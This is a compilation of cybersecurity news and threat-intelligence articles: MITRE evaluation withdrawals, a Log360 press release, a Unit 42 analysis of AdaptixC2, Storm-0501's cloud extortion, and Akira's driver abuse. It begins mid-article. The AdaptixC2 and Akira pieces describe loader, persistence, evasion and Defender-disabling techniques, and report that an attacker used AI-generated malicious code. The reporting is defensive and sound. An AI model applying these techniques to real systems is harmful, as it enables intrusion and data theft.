esso. L’eccesso di allarmi, spesso ignorati o classificati come “rumore di fondo”, è la conseguenza di questa separazione. Secondo Ganesan, la vera cyber resilience nasce quando la sicurezza diventa parte del linguaggio aziendale, condivisa tra IT, management e funzioni operative. In altre parole, quando il personale non tecnico sa riconoscere un rischio digitale come parte del proprio ruolo. L’automazione aiuta a rendere visibili questi segnali, ma è la governance trasversale a trasformarli in decisioni. La gestione intelligente degli allarmi, quindi, non è solo un esercizio di machine learning, ma un cambiamento culturale che sposta la sicurezza dal perimetro alla strategia. L’autonomous IT come ecosistema adattivo Nel delineare la prospettiva futura, Ganesan definisce l’autonomous IT come un sistema che apprende dal comportamento umano e lo amplifica, senza sostituirlo. L’obiettivo è costruire infrastrutture capaci di reagire a minacce emergenti in modo dinamico, adattando le risposte alle priorità aziendali. In questa visione, gli agenti digitali non sono entità isolate, ma componenti di un ecosistema distribuito che collega sicurezza, operations e governance. Possono analizzare i flussi di log in tempo reale, correlare anomalie tra diversi sistemi e suggerire azioni correttive basate su dati aggiornati. Ma il punto non è l’automazione in sé, bensì la collaborazione intelligente tra persone e macchine, dove ogni decisione è verificabile e tracciabile. La cyber resilience si realizza, così, come qualità emergente del sistema, non come somma di strumenti. Quando la tecnologia lavora in background e i team possono concentrarsi sulla strategia, la sicurezza diventa un attributo naturale dell’organizzazione, non un costo o un obbligo normativo. Misurare la resilienza: un obiettivo collettivo L’approccio descritto da Ganesan suggerisce una ridefinizione dei parametri con cui si misura la sicurezza aziendale. Non più solo il numero di incidenti evitati, ma la rapidità di risposta, la continuità dei servizi e la capacità di apprendere dagli errori. In questa prospettiva, l’autonomous IT non è un punto d’arrivo ma un percorso: un equilibrio fra automazione e controllo umano, fra velocità e affidabilità. Le organizzazioni più mature in termini di cyber resilience saranno quelle in grado di integrare questi elementi in modo trasparente, costruendo un modello di sicurezza distribuita e adattiva. Come ricorda Ganesan, «le possibilità davanti a noi sono infinite». Ma l’infinità delle possibilità, nel lessico della sicurezza, non è sinonimo di libertà assoluta: significa responsabilità continua, vigilanza costante e capacità di ripensare, ogni giorno, la relazione tra tecnologia e fiducia.
cybersecurity360.itOct 14, 2025extracted
Major Cyber Threat Detection Vendors Pull Out of MITRE Evaluations Test
Three major providers of cybersecurity solutions have decided not to take part in the 2025 edition of MITRE’s annual endpoint detection and response (EDR) solution test. After Microsoft announced it would not participate in MITRE Engenuity ATT&CK Evaluations: Enterprise 2025 in June, SentinelOne and Palo Alto Networks confirmed on September 12 they were also pulling out of the test for this year. These decisions have raised concerns among the cybersecurity community about the program’s future and relevancy. It is a particularly surprising decision for Microsoft, which used its ranking in the test to promote its solution, Microsoft Defender XDR, as recently as December 2024. Interestingly, all three companies justified the move by saying they wanted to prioritize product development and innovation. However, experts have suggested that other factors may also be at play, including the tests becoming increasingly seen as promotional rather than achieving real security gains. Infosecurity spoke with Charles Clancy, MITRE CTO and SVP of MITRE Labs, who shared key elements of the evolution of the evaluation test that could explain the decisions ahead of the results of this year’s test in December 2025. Backstory of ATT&CK Evaluations: Enterprise MITRE Corporation is a US-based non-profit organization running many cybersecurity programs, including some on behalf of the US government. MITRE introduced its ATT&CK framework in 2015, which quickly became the standard tool in the cybersecurity industry for mapping real-world cyber adversaries’ techniques, tactics and procedures (TTPs). In 2019, MITRE ATT&CK launched its first Evaluations program to “fill a gap in the security testing market,” Clancy argued. “There were many types of third-party testing out there for cybersecurity products, but each one of them had their own process and scoring methodology, leading to inconsistent results and a lack of rigor that wasn’t driving the industry forward,” he explained. MITRE Engenuity ATT&CK Evaluations: Enterprise is the most regular of all Evaluations tests, occurring every year since its launch. In a LinkedIn post, Igal Gofman, the director of engineering at CrowdStrike and a former security researcher at Microsoft and Tenable, called the test the “Olympics of cybersecurity.” Among the 1000 people working in MITRE’s cybersecurity practice, 133 are dedicated to MITRE ATT&CK, of whom 12 to 15 people are working on the Evaluations tests, Clancy told Infosecurity. Each year, the team behind the testing program picks one of several real-life adversaries and/or attack chains based on their TTPs mapped in ATT&CK. They then test the EDR solutions of participating vendors in simulated attacks using Caldera, MITRE’s own automated adversary emulation platform, according to several criteria, including detection results, false positives and true negatives. Although this test can be used to compare how effective EDR solutions are, Clancy noted it should not be seen as a longitudinal benchmark because each annual test differs greatly from the previous one. “The ethos we’re trying to drive in the testing is comparison of an individual product to detect a particular threat actor. Simulating different adversaries year over year is really important to understand different classes of emerging threats,” Clancy said. Inside the Test's 2024 and 2025 Editions In 2024, MITRE ATT&CK Evaluations: Enterprise emulated 14 techniques across 7 tactics from known North Korean-affiliated hackers, 16 techniques across 7 tactics from the CL0P ransomware group and 31 techniques across 11 tactics from the LockBit ransomware group. CrowdStrike, one of the leading EDR providers, did not take part in that year’s edition, with one member of the CrowdStrike subreddit – who claimed to be working for the company – suggesting that the evaluation was set to take place shortly after the July 19 global outage that affected the company’s EDR product. In 2025, the ATT&CK Evaluations team has selected two scenarios: A financially motivated cyberciminal collective scenario: multi-faceted intrusion in a hybrid environment that features social engineering, cloud infrastructure exploitation, identity abuse and living off the land (LOTL) techniques A Chinese-aligned cyber-espionage scenario: evasive intrusion highlighting the adversary’s adept use of social engineering, abuse of legitimate applications and services, establishing persistent mechanisms and employing custom malware to evade detection While he admitted vendors can vary year-over-year, Clancy assured they can rely on “a lot of repeat customers.” Why Vendors Are Pulling Out of MITRE’s Test However, this year’s edition, the results of which are expected in December, will be missing three major players: Microsoft, SentinelOne and Palo Alto Networks. Microsoft announced it will not take part in this year’s test on June 13, claiming that this decision “allows us to focus all our resources on the Secure Future Initiative and on delivering product innovation to our customers.” On September 12, SentinelOne and Palo Alto released similar statements. The former said it wanted to “prioritize our product and engineering resources on customer-focused initiatives while accelerating our platform roadmap,” while the latter explained that this decision “enables us to further accelerate critical platform innovations that directly address our customers' most pressing security challenges and respond even faster to the evolving threat landscape.” When contacted by Infosecurity, SentinelOne and Palo Alto Networks declined to provide further comment. Microsoft did not respond to a request for comment. However, MITRE’s Clancy said he is in close contact with the three vendors and believes he knows the reasons that made them pull out of this year’s test. First, as the vendors said in their statements, taking part in MITRE ATT&CK Evaluations program requires a resource-intensive commitment, suggesting that the time and personnel dedicated to it are lost on other projects. Then, Clancy said that the team behind the test strives to make it harder every year and conceded they may have pushed it too far this year. “Each year, we want to design a test that’s harder than the year before in order to drive the whole industry forward, since the test can offer an opportunity for vendors to upgrade their products in preparation for the test and once they get the results. And sometimes, we don’t get the balance quite right,” he explained. Speaking to Infosecurity, Vishal Santharam, a senior product manager for endpoint security products at ManageEngine, elaborated on Clancy’s point. “In 2024, MITRE started recording the volume of alerts in the evaluations, which is always a challenge for a vendor to tune in to. More alerts mean increased alert fatigue,” he said, referring to a Forrester study decoding the 2024 MITRE Evaluations: Enterprise based on alert volume. Additionally, Santharam noted that the 2025 Evaluations: Enterprise test included cloud environment, “which is untested territory and requires even more attention from vendors.” Finally, Clancy told Infosecurity that his team used to run a vendor forum each year to prepare for the MITRE ATT&CK Evaluations: Enterprise test. “This forum, which was helpful in working with industry to set the objectives of the test each year, fell off over the last couple of years,” Clancy admitted. On LinkedIn, CrowdStrike’s Gofman argued that the MITRE Evaluations tests were initially a great initiative to benchmark security solutions, but they turned into “vendor theater” in recent years. “Vendors investing huge resources for PR wins, not real security improvements. With MITRE and CISA under pressure from budget cuts and changes, some vendors likely saw an opportunity to step back,” he said. “The concept of TTP-based testing is still valuable, but the way it’s evolved, outdated, overly endpoint-focused, detached from real-world threats is far less so,” he added. Patrick Garrity, a vulnerability researcher at VulnCheck, corroborated this view: “[It] sounds like this benchmarking activity has become a giant distraction to building better products in exchange for publicity,” he said in another LinkedIn post. Despite these concerns, Clancy confirmed that a dozen cybersecurity vendors were still taking part in the 2025 edition of the test. MITRE to Reboot Vendor Forum in 2026 Clancy told Infosecurity that his team intended to re-establish the vendor forum ahead of MITRE ATT&CK Evaluations: Enterprise 2026. “This is something we’re already working to re-establish for the 2026 edition,” he said. He later made this ambition public in a LinkedIn post published on September 18, after SentinelOne and Palo Alto announced they would not participate in the 2025 edition. Santharam also told Infosecurity that ManageEngine was working on an EDR solution and intended to participate in MITRE Engenuity ATT&CK Evaluations: Enterprise in 2026. "The Advanced Anti-Malware and Next-Gen AV products from ManageEngine were certified by AV-Comparatives on their first try. The solution paves the way for our next EDR offering while also providing comprehensive protection against malware and ransomware," he said. "We are also gearing up to take part in the forthcoming Gartner Magic Quadrant for Endpoint Protection Platform (EPP), and the MITRE ATT&CK tests. In addition to proving the robustness and reliability of our technology, these independent assessments also assist clients in developing confidence in our EDR capabilities."
infosecurity-magazine.comSep 22, 2025extracted
ManageEngine enhances Log360 to reduce alert fatigue for SOC teams
ManageEngine enhances Log360 to reduce alert fatigue for SOC teams ManageEngine unveiled that its security information and event management (SIEM) solution, Log360, has been strengthened with a reengineered threat detection approach, in a major enhancement aimed at addressing the needs of security operations center (SOC) teams. Over 60% of SOC teams are overwhelmed with irrelevant threat data, of which a majority (53%) of cloud security alerts can be considered noise, according to the 2025 Threat Intelligence Benchmark study commissioned by Google. ManageEngine’s latest release bolsters Log360’s position as a unified security platform by filtering out the security alert noise, thereby enabling faster triage and reducing burnout issues faced by security analysts. “The biggest challenge for security teams today isn’t collecting data, it’s separating genuine signals from overwhelming noise,” said Manikandan Thangaraj, VP at ManageEngine. “We’ve reengineered our detection system to not just build more complex rules, but to deliver true efficiency and empower SOC with flexible, granular rule-tuning capabilities that go beyond simple thresholds. With this advancement, SOC analysts can filter out benign noise without sacrificing the ability to catch a true compromise. This shifts our focus to a targeted pursuit of genuine threats, ensuring we’re protecting and not just monitoring twenty-four seven.” The new capabilities include a centralized detection console, object-level rule filters, and over 1,500 prebuilt detection rules that are continuously delivered and updated from the cloud. This upgrade also lays the foundation for enterprise-grade scalability, with a multi-tier architecture, role-specialized log processing, and centralized multi-site collection, ensuring performance and resilience as data sources and log volumes grow. ECSO 911 validates Log360’s impact Early beta testing by Emergency Communications of Southern Oregon (ECSO) 911, a United States-based Log360 customer, validated the impact of these improvements, demonstrating a measurable reduction in false positive alerts and faster detection-to-response cycles. ECSO is a combined emergency dispatch facility and Public Safety Answering Point (PSAP) for all of the 911 lines in Jackson County and Crater Lake National Park in the state of Oregon. “For a 911 emergency communications center, security is the foundation of public trust, and any failure has immediate, real-world consequences. The latest advanced detection capabilities are not optional, they are essential,” said Corey Nelson, IT manager, ECSO 911. “With Log360’s optimized detection rules and filtering techniques, we have reduced false or low-priority alerts by 90%, allowing our analysts to focus on the threats that matter most. This improvement has significantly accelerated our ability to identify and respond to real cyber incidents.” Key highlights of Log360’s new upgrade Reengineered detection: Log360 introduces a unified detection console that consolidates all detection content, including MITRE ATT&CK-aligned rules, correlation logic, user and entity behavior analytics (UEBA) insights, and threat intel feeds, into a single pane of glass. Security teams can create standard, anomaly-based, or advanced detection rules through an interactive UI, without writing complex queries. Object-level filters across Active Directory users, groups, and OUs ensure that high-value identities are continuously monitored while suppressing low-priority noise. Cloud-delivered content: More than 1,500 prebuilt rules cover a wide range of use cases from privilege escalation and lateral movement to endpoint tampering and SaaS attacks. These rules are researched, curated, and tested by ManageEngine’s in-house threat research team to ensure accuracy and low false positives, and are delivered through a cloud-based update mechanism so users always stay current. Adoption of SIGMA-based detection rules is also included in this refined package. Multi-tier enterprise architecture: Log360’s architecture enhancements enable horizontal scalability with log processor clusters and role-based processing (correlation, enrichment, alerting), as well as centralized collection from distributed sites, ensuring performance continuity even in large, geographically distributed enterprises.
helpnetsecurity.comSep 17, 2025extracted
AdaptixC2: A New Open-Source Framework Leveraged in Real-World Attacks
In early May 2025, Unit 42 researchers observed that AdaptixC2 was used to infect several systems. AdaptixC2 is a recently identified, open-source post-exploitation and adversarial emulation framework made for penetration testers that threat actors are using in campaigns. Unlike many well-known C2 frameworks, AdaptixC2 has remained largely under the radar. There is limited public documentation available demonstrating its use in real-world attacks. Our research looks at what AdaptixC2 can do, helping security teams to defend against it. AdaptixC2 is a versatile post-exploitation framework. Threat actors use it to execute commands, transfer files and perform data exfiltration on compromised systems. Because it’s open-source, threat actors can easily customize and adapt it for their specific objectives. This makes it a highly flexible and dangerous tool. The emergence of AdaptixC2 as a tool used in the wild by threat actors highlights a growing trend of attackers using customizable frameworks to evade detection. Palo Alto Networks customers are better protected from the threats described in this article through the following products: If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team. AdaptixC2 is an open-source C2 framework that we recently saw being used in several real-world attacks. We identified two AdaptixC2 infections. One case leveraged social engineering techniques. We assess with high confidence that the other used AI-based code generation tools. AdaptixC2 is a red teaming tool that can be used to perform adversarial actions, which can be expanded for customization. If this were used by a threat actor, they could comprehensively control impacted machines, to execute a wide range of actions. These include: Manipulating the file system Listing directories Creating, modifying and deleting files and folders Enumerating running processes Terminating specific applications Initiating new program executions Threat actors use these capabilities to establish and maintain a foothold in an environment, further explore the compromised system and move laterally within the network. To facilitate covert communication and bypass network restrictions, the framework supports sophisticated tunneling capabilities, including SOCKS4/5 proxy functionality and port forwarding. This enables attackers to maintain communication channels even if the network is heavily protected. AdaptixC2 is designed to be modular, using “extenders” that act like plugins for both listeners and agents. This lets hackers create custom payloads and ways to avoid detection that are specific to the system they're attacking. AdaptixC2 also supports Beacon Object Files (BOFs), which let attackers run small, custom programs written in C directly within the agent's process to evade detection. AdaptixC2’s beacon agents are equipped with dedicated commands for transferring data quickly and secretly. These agents support both x86 and x64 architectures, and can be generated in various formats, including: Standalone executables (EXEs) Dynamic-link libraries (DLLs) Service executables Raw shellcode Attackers can use the AdaptixC2 framework to steal data from the compromised network. This data exfiltration functionality allows configurable chunk sizes for file downloads and uploads, as network-based detection is likely to see smaller segments as less suspicious. The AdaptixC2 interface shows linked agents and sessions in a graphical view. Figure 1 shows an attacker’s view of how multi-stage attacks are progressing and what paths are available for moving around a targeted network. AdaptixC2 also has features to help the attacker maintain operational security (OpSec). These include parameters that help them blend in with normal network traffic: KillDate – This sets a date to make the beacon stop working WorkingTime – This sets the beacon to only be active during certain hours Additionally, threat actors can modify and enhance the agent using custom obfuscation, anti-analysis and evasion techniques, making it a continuously evolving threat. AdaptixC2’s configuration is encrypted, and supports three primary beacon types through specialized profile structures: BEACON_HTTP for web-based communication BEACON_SMB for named pipe communication BEACON_TCP for direct TCP connections The HTTP profile is the most common beacon variant and contains typical web communication parameters such as: Servers Ports SSL settings HTTP methods URIs Headers User-agent strings The SMB profile uses Windows named pipes when HTTP might be blocked or monitored. The TCP profile is used to create direct socket connections with the option to prepend data for basic protocol obfuscation. AdaptixC2 includes a built-in default configuration that demonstrates typical deployment parameters. The default HTTP profile targets 172.16.196.1:4443 using HTTPS communication, with a POST method to the /uri.php endpoint and the X-Beacon-Id parameter for beacon identification. Figure 2 shows how to configure the beacon. After clicking “Create,” the beacon builder encrypts the configuration with RC4 and then embeds it in the compiled beacon. The encrypted configuration is stored as follows: 4 bytes: Configuration size (32-bit integer) N bytes: RC4-encrypted configuration data 16 bytes: RC4 encryption key The following code is the key extraction logic, taken from AgentConfig.cpp: Because the encryption is simple and predictable, defenders can develop an extractor that will extract configurations from samples automatically. This extraction tool should work in the same way that the beacon loads its own configurations. The extractor locates the configuration in the PE file’s .rdata section. It then extracts the size (first four bytes), encrypted data block and RC4 key (last 16 bytes). After using the embedded RC4 key to decrypt the data, it parses the plaintext configuration by unpacking the following fields: Agent type SSL flag Server count Servers/ports HTTP parameters Timing settings Using this method, we created a tool that can process AdaptixC2 samples and get their embedded configurations. The complete extractor code supports the BEACON_HTTP variant. This tool is provided in the Configuration Extractor Example section. Researchers can use this extractor to analyze AdaptixC2 samples or adapt the code for other variants. Following is the built-in default configuration of the beacon. In May 2025, we investigated multiple incidents where threat actors installed AdaptixC2 beacons. In some cases, we observed threat actors using the same attack vector, shown in Figure 3. The threat actors leveraged trust in Microsoft Teams to trick people into giving them access to company systems. In one case, attackers used phishing attacks to impersonate IT support personnel (using subject lines like “Help Desk (External) | Microsoft Teams”). This convinced employees to initiate legitimate remote assistance sessions using tools like the Quick Assist Remote Monitoring and Management (RMM) tool. Threat actors often misuse legitimate products for malicious purposes. This does not necessarily imply a flaw or malicious quality to the legitimate product being misused. The 2025 Unit 42 Global Incident Response Report: Social Engineering Edition noted that social engineering techniques like this are the most prevalent initial access vector for compromises we observe. This initial access provides the attackers with a foothold within the targeted system, without having to bypass perimeter defenses such as firewalls and intrusion detection systems. The attackers deployed the AdaptixC2 beacon using a multi-stage PowerShell loader that downloads an encoded and encrypted payload from a link to a legitimate service, Once downloaded, the PowerShell script decrypts the payload using a simple XOR key. Instead of writing the decrypted payload to disk, which would make it easier to detect, the script leverages .NET capabilities to allocate memory within the PowerShell process itself. The script then copies the decrypted payload, which is actually shellcode, into this allocated memory region. This fileless approach significantly reduces the attacker’s footprint on the system. The script uses a technique called “dynamic invocation” to execute the shellcode directly from memory. It does this using the GetDelegateForFunctionPointer method, which dynamically creates a delegate (a type-safe function pointer) that points to the beginning of the shellcode in memory. The script then calls this delegate as if it were a normal function, effectively executing the shellcode without writing an executable file to disk. To guarantee the malicious process automatically starts after reboot, the script creates a shortcut in the startup folder. Figure 4 shows the PowerShell script. The beacon variant loaded in this attack had the following configuration: Following the successful deployment of AdaptixC2, the attackers initiated reconnaissance activities, using command-line tools to gather information about the compromised systems and network. This included discovery commands such as nltest.exe, whoami.exe and ipconfig.exe. The beacon then established communication with a remote server, enabling the threat actors to obtain C2 on the infected machine. In another case, threat actors deployed a PowerShell script that was designed to deploy AdaptixC2 beacons. We assess with high confidence that this script was AI-generated. This deployment was done both through in-memory shellcode injection and using a file-based DLL hijacking persistence mechanism. The script, shown in Figure 5, focuses on staying hidden on the impacted system to give the hackers a strong foothold. Downloading and decoding shellcode: The script downloads a Base64-encoded shellcode payload from a remote server using Invoke-RestMethod. The downloaded content is then decoded. Allocating memory, copying shellcode and changing memory protection: The script allocates a block of unmanaged memory. The AdaptixC2 shellcode is then copied into the allocated memory and changes the memory protection attributes of the allocated memory region via VirtualProtect to 0x40 (PAGE_EXECUTE_READWRITE). This enables the execution of the shellcode. Executing shellcode via dynamic invocation: As in the previous case, the attacker used GetDelegateForFunctionPointer to create a delegate instance that points to the beginning of the shellcode in memory. The attacker then used the Invoke() method to execute the shellcode, launching the in-memory beacon. DLL hijacking persistence: The script targets the APPDATA\Microsoft\Windows\Templates directory for DLL hijacking, using msimg32.dll. This DLL is also a beacon version. Persistence via registry run key: The script creates a registry entry in the run key named “Updater,” with a PowerShell command that executes the loader.ps1 script. This ensures that the loader.ps1 script runs every time the user logs in, to execute the beacon. The structure and composition of this PowerShell script strongly suggests that the attacker used AI-assisted generation. The following stylistic elements are commonly observed in code generated by AI tools: Verbose, numbered comments: - "# === [1] Download and decode shellcode ===" Check mark icons in the output message: - Write-Output "[✔] Persistence set via Run key and DLL hijack DLL dropped to $templatesPath" We assess with high confidence that the code was generated with the assistance of AI. This is based on the factors above, as well as evidence gathered from the attacker’s server and results extracted from two separate AI detectors. AI tools without sufficient guardrails can let attackers rapidly develop malicious code, making it easier to execute operations in infected networks. A consistent pattern emerged across both of these incidents: PowerShell-based loaders - Threat actors used these loaders to deploy the AdaptixC2 beacon, prioritizing stealth and persistent access. Downloading a payload from a remote server and executing it in memory - Using a legitimate resource helped the attackers to stay under the radar, by minimizing detectable traces on disk. Relying on .NET capabilities for memory allocation and dynamic invocation - Threat actors leveraged built-in system functionalities like the GetDelegateForFunctionPointer method to execute shellcode, for efficiency and stealth. Preventing beacon removal with persistence mechanisms - While the first script relied solely on a shortcut in the startup folder for persistence, the second added DLL hijacking. - This gives attackers more ways to stay on the compromised system. Using similar naming conventions for scripts and run keys - In one case, the attackers named the malicious script update.ps1. In another case, the run key for persistence was called Updater. - This naming helps scripts and keys to blend in with legitimate system processes. Our telemetry and threat intelligence show that AdaptixC2 is becoming more common. We continue to identify new AdaptixC2 servers, suggesting that more threat actors are adopting this framework as part of their attack toolkit. This trend extends beyond typical post-exploitation scenarios. For example, attackers deployed Fog ransomware alongside AdaptixC2 in a recent attack on a financial institution in Asia. This shows that AdaptixC2 is versatile and can be used with other malicious tools, like ransomware, to achieve broader objectives. AdaptixC2 is an adaptable threat, which is shown by its increasing popularity with threat actors and the complexity of its deployment techniques. The framework’s modularity, combined with the potential for AI-assisted code generation, could allow threat actors to rapidly evolve their tactics. Security teams must remain aware of AdaptixC2’s capabilities and proactively adapt their defenses to counter this threat. Palo Alto Networks customers are better protected from the threats discussed above through the following products and services: Advanced URL Filtering and Advanced DNS Security identify known domains and URLs associated with this activity as malicious. Advanced Threat Prevention has an inbuilt machine learning-based detection that can detect exploits in real time. TheAdvanced WildFire machine-learning models and analysis techniques have been reviewed and updated in light of the indicators shared in this research. Cortex XDR and XSIAM help prevent malware by employing the Malware Prevention Engine. This approach combines several layers of protection designed to prevent both known and unknown malware from causing harm to your endpoints. The mitigation techniques that the Malware Prevention Engine employs vary by endpoint type. If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call: North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42) UK: +44.20.3743.3660 Europe and Middle East: +31.20.299.3130 Asia: +65.6983.8730 Japan: +81.50.1790.0200 Australia: +61.2.4062.7950 India: 00080005045107 Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance. Defenders can use these Yara rules to check for the presence of AdaptixC2 beacons on machines. Query description: The following XQL query hunts for phishing activity conducted via the Teams application that leads to RMM execution. These attributes are commonly targeted by attackers to deploy AdaptixC2 beacons. Investigation notes: Start by checking the User Session Title. Look for RMM tool execution and child process or file creation using the RMM tool. Look for alerts or suspicious executions such as cmd or PowerShell by the compromised user (actor_effective_username). The following code is an example of a configuration extractor that extracts configurations from HTTP beacon files. AdaptixC2 – GitHub Fog Ransomware: Unusual Toolset Used in Recent Attack – Symantec 2025 Unit 42 Global Incident Response Report: Social Engineering Edition – Unit 42 What is Phishing – Palo Alto Networks What is RMM – ManageEngine What Are Fileless Malware Attacks – Palo Alto Networks DLL Hijacking Techniques – Unit 42 Unit 42 Develops Agentic AI Attack Framework – Palo Alto Networks Marshal.GetDelegateForFunctionPointer Method – Microsoft Docs Invoke-RestMethod (PowerShell) – Microsoft Docs VirtualProtect function – Microsoft Docs Memory Protection Constants – Microsoft Docs MITRE ATT&CK T1547.001 – MITRE
unit42.paloaltonetworks.comSep 10, 2025extracted
Storm-0501 Exploits Entra ID to Exfiltrate and Delete Azure Data in Hybrid Cloud Attacks
The financially motivated threat actor known as Storm-0501 has been observed refining its tactics to conduct data exfiltration and extortion attacks targeting cloud environments. "Unlike traditional on-premises ransomware, where the threat actor typically deploys malware to encrypt critical files across endpoints within the compromised network and then negotiates for a decryption key, cloud-based ransomware introduces a fundamental shift," the Microsoft Threat Intelligence team said in a report shared with The Hacker News. "Leveraging cloud-native capabilities, Storm-0501 rapidly exfiltrates large volumes of data, destroys data and backups within the victim environment, and demands ransom -- all without relying on traditional malware deployment." Storm-0501 was first documented by Microsoft almost a year ago, detailing its hybrid cloud ransomware attacks targeting government, manufacturing, transportation, and law enforcement sectors in the U.S., with the threat actors pivoting from on-premises to cloud for subsequent data exfiltration, credential theft, and ransomware deployment. The Windows maker told The Hacker News the latest wave of attacks targeting is opportunistic and not sector-specific, and that multiple organizations including schools, healthcare, and other entities have been attacked by the e-crime crew. Assessed to be active since 2021, the hacking group has evolved into a ransomware-as-a-service (RaaS) affiliate delivering various ransomware payloads over the years, such as Sabbath, Hive, BlackCat (ALPHV), Hunters International, LockBit, and Embargo. "Storm-0501 has continued to demonstrate proficiency in moving between on-premises and cloud environments, exemplifying how threat actors adapt as hybrid cloud adoption grows," the company said. "They hunt for unmanaged devices and security gaps in hybrid cloud environments to evade detection and escalate cloud privileges and, in some cases, traverse tenants in multi-tenant setups to achieve their goals." Typical attack chains involve the threat actor abusing their initial access to achieve privilege escalation to a domain administrator, followed by on-premises lateral movement and reconnaissance steps that allow the attackers to breach the target's cloud environment, thereby initiating a multi-stage sequence involving persistence, privilege escalation, data exfiltration, encryption, and extortion. Initial access, per Microsoft, is achieved through intrusions facilitated by access brokers like Storm-0249 and Storm-0900, taking advantage of stolen, compromised credentials to sign in to the target system, or exploiting various known remote code execution vulnerabilities in unpatched public-facing servers. "Access brokers typically sell or provide footholds into organizations, which ransomware operators then use to launch their attacks," Sherrod DeGrippo, Director of Threat Intelligence Strategy at Microsoft, said. "In the past, Storm-0501 and its affiliates have exploited known remote code execution vulnerabilities in unpatched, internet-facing servers, including products like Zoho ManageEngine, Citrix NetScaler, and Adobe ColdFusion 2016. By targeting these vulnerabilities, threat actors can bypass perimeter defenses and establish a presence inside the network, setting the stage for further compromise and ransomware deployment." In a recent campaign targeting an unnamed large enterprise with multiple subsidiaries, Storm-0501 is said to have conducted reconnaissance before laterally moving across the network using Evil-WinRM. The attackers also carried out what's called a DCSync Attack to extract credentials from Active Directory by simulating the behavior of a domain controller. "Leveraging their foothold in the Active Directory environment, they traversed between Active Directory domains and eventually moved laterally to compromise a second Entra Connect server associated with a different Entra ID tenant and Active Directory domain," Microsoft said. "The threat actor extracted the Directory Synchronization Account to repeat the reconnaissance process, this time targeting identities and resources in the second tenant." These efforts ultimately enabled Storm-0501 to identify a non-human synced identity with a Global Admin role in Microsoft Entra ID on that tenant, and lacking in multi-factor authentication (MFA) protections. This subsequently opened the door to a scenario where the attackers reset the user's on-premises password, causing it to be synced to the cloud identity of that user using the Entra Connect Sync service. Armed with the compromised Global Admin account, the digital intruders have been found to access the Azure Portal, registering a threat actor-owned Entra ID tenant as a trusted federated domain to create a backdoor, and then elevate their access to critical Azure resources, before setting the stage for data exfiltration and extortion. "After completing the exfiltration phase, Storm-0501 initiated the mass-deletion of the Azure resources containing the victim organization data, preventing the victim from taking remediation and mitigation action by restoring the data," Microsoft said. "After successfully exfiltrating and destroying the data within the Azure environment, the threat actor initiated the extortion phase, where they contacted the victims using Microsoft Teams using one of the previously compromised users, demanding ransom." The company said it has enacted a change in Microsoft Entra ID that prevents threat actors from abusing Directory Synchronization Accounts to escalate privileges. It has also released updates to Microsoft Entra Connect (version 2.5.3.0) to support Modern Authentication to allow customers to configure application-based authentication for enhanced security. "It is also important to enable Trusted Platform Module (TPM) on the Entra Connect Sync server to securely store sensitive credentials and cryptographic keys, mitigating Storm-0501’s credential extraction techniques," the tech giant added. (The story was updated after publication to include responses from Microsoft.)
thehackernews.comAug 27, 2025extracted
Akira ransomware abuses CPU tuning tool to disable Microsoft Defender
Akira ransomware is abusing a legitimate Intel CPU tuning driver to turn off Microsoft Defender in attacks from security tools and EDRs running on target machines. The abused driver is 'rwdrv.sys' (used by ThrottleStop), which the threat actors register as a service to gain kernel-level access. This driver is likely used to load a second driver, 'hlpdrv.sys,' a malicious tool that manipulates Windows Defender to turn off its protections. This is a 'Bring Your Own Vulnerable Driver' (BYOVD) attack, where threat actors use legitimate signed drivers that have known vulnerabilities or weaknesses that can be abused to achieve privilege escalation. This driver is then used to load a malicious tool that disables Microsoft Defender. "The second driver, hlpdrv.sys, is similarly registered as a service. When executed, it modifies the DisableAntiSpyware settings of Windows Defender within \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware," explain the researchers. "The malware accomplishes this via execution of regedit.exe." This tactic was observed by Guidepoint Security, which reports seeing repeated abuse of the rwdrv.sys driver in Akira ransomware attacks since July 15, 2025. "We are flagging this behavior because of its ubiquity in recent Akira ransomware IR cases. This high-fidelity indicator can be used for proactive detection and retroactive threat hunting," continued the report. To help defenders detect and block these attacks, Guidepoint Security has provided a YARA rule for hlpdrv.sys, as well as complete indicators of compromise (IoCs) for both drivers, their service names, and file paths where they are dropped. Akira attacks on SonicWall SSLVPN Akira ransomware was recently linked to attacks on SonicWall VPNs using what is believed to be an unknown flaw. Guidepoint Security says it could neither confirm nor debunk the exploitation of a zero-day vulnerability in SonicWall VPNs by Akira ransomware operators. In response to reports about elevated offensive activity, SonicWall advised disabling or restricting SSLVPN, enforcing multi-factor authentication (MFA), enabling Botnet/Geo-IP protection, and removing unused accounts. Meanwhile, The DFIR Report has published an analysis of recent Akira ransomware attacks, highlighting the use of the Bumblebee malware loader delivered via trojanized MSI installers of IT software tools. An example involves searches for "ManageEngine OpManager" on Bing, where SEO poisoning redirected the victim to the malicious site opmanager[.]pro. Bumblebee is launched via DLL sideloading, and once C2 communication is established, it drops AdaptixC2 for persistent access. The attackers then conduct internal reconnaissance, create privileged accounts, and exfiltrate data using FileZilla, while maintaining access via RustDesk and SSH tunnels. After approximately 44 hours, the main Akira ransomware payload (locker.exe) is deployed to encrypt systems across domains. Until the SonicWall VPN situation clears up, system administrators should monitor for Akira-related activity and apply filters and blocks as indicators emerge from security research. It is also strongly advised to only download software from official sites and mirrors, as impersonation sites have become a common source for malware. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comAug 6, 2025extracted
From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira
